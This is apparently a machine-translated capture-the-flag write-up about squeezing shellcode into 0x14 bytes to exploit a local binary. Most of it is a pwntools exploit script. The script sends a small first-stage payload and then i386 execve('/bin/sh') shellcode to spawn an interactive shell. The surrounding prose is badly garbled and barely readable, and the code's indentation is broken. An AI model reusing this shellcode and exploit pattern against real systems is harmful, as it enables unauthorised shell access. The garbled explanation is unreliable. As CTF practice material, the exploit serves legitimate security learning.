The only difficulty is the question of just shellcode to the size of 0x14
Actually, this problem does not intend to send blog but there is little sister to see ~ ~ ~ to send up to write a
Then we look at the content of the program about
{Say a sand sculpture of thing very special nature of this program f5 is no way to see it and then the person in charge of a bad mood b
Then I put the call eax mess program nop
f5 a shuttle
}
23333 So the question really is, is to focus on shellcode to change the parameters of a large number of like a push ret shuttle
emmm feeling gave comments directly to see exp
import sys
from pwn import *
#context.log_level='debug'
#context.arch='amd64'
if len(sys.argv)==1 :
io=process('./pwn_1')
elf=ELF('./pwn_1')
#libc=ELF('')
pay='\xC7\x44\x24\x08\x44\x00\x00\x00'
#mov dword ptr [esp + 8], 0x44
pay+=asm("push 0x0804848E")
pay+=asm("ret")
print len(pay)
gdb.attach(io,'b *0x080484CB')
io.sendline(pay)
io.recv()
pay=asm("push 0xb")
pay+=asm("pop eax")
pay+=asm("cdq")
pay+=asm("push edx")
pay+=asm("sub ebp,8")
pay+=asm("mov ebx,ebp")
pay+=asm("xor ecx,ecx")
pay+=asm("int 0x80")
pay=pay.ljust(0x21,'a')
pay+='/bin/sh\x00'
print len(pay)
io.sendline(pay)
#pause()
io.interactive()